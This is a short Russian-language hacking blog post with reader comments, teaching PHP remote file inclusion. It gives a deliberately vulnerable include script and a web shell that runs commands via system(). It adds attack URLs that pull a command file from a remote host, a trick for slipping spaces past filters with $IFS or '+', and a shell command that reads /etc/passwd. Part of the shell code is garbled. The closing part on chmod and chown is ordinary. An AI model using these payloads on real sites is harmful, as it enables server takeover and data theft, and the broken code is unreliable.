Удаленный PHP — Инклуд

Если локальный инклуд позволят только просматривать файлы, то удаленный, или глобальный, инклуд дает возможность загружать файлы с других веб сайтов.

Загружаемый с хакерского сайта файл может содержать небольшую прорамму на языке PHP, позволяющую нам из адресной строки браузера вводить nix -команда, которые будут выполняться на атакуемой система.

Например http://test.ru/include.php?com=http://narod.ru/cmd.txt&cmd=ls

В данном примере команда ls выводит список файлов в текущем каталогам.

ЭКСПЕРИМЕНТЫ:

Создадим файл inj.php

$page = ($_GET['page']);
include ("$page");

теперь можно загружать любой файл со стороны.
создадим ещё один файл cmd.php который будет у нас как раз и загружаться удаленно.

$cmd\n");
system($cmd);

теперь проверим http://localhost/inj.php?page=http://localhost/cmd.php?cmd=ls

у вас должно вывести название команды и содержимое текущего каталога, можете поэксперементировать, и вести другие команды, (uname,pwd,dir)

Доступ который мы получили несёт название веб-шелл.

для того чтобы команду выполнять с параметрами(Аргументы) допусти ls -l и пробел между ls и -l нужно заменить на переменую окружения $IFS, или на +, то есть команду ls -l нужно вести так => ls$IFS-l или ls+-ls

Зашел разговро о ls -l то раскажу о правах доступа.

Команда для изменения права доступа: chmod 777 файл или папка

Первая 7 означает все права для владельца

вторая 7 означает все права на группу

третья 7 означает все права для других пользователей

команда chmod -R 777 test/ изменить права на папку и на все её дочерние директории и файлы.

цифры для назначения прав

0- никаких прав

1- только исполнения

2-только запись

3-запись и исполнения

4-только чтение

5-чтение и исполнение

6 — чтение и исполнения

7 -все права

ещё одна команда:  chown пользователь:группа (файл или папка) — изменяет группу и владельца файлы или директории

с параметром -R изменяет  все файл и директории   chown -R пользователь:группа (файл или папка)

ещё полезная команда cat смотрит содержимое любого файла: пример cat /etc/passwd

вы можете попробовать кстати в наш эксперимен вести http://localhost/inj.php?page=http://localhost/cmd.php?cmd=cat+/etc/passwd , но не забывайте пробелы не ставятся а ставятся знак «+»

на этом  закончим!!!!!!

Комментарии (4 комментария) на "Удаленный PHP — Инклуд"

  1. спасибо за интересный блог

  2. admin:

    Да пожалуйста, в скором времени будут появляться больше разной информации

  3. Me:

    Слизал подчистую с пособия Жукова! ахахаха!

  4. admin:

    нет с сайта хакер, как и жуков)))

Отправить комментарий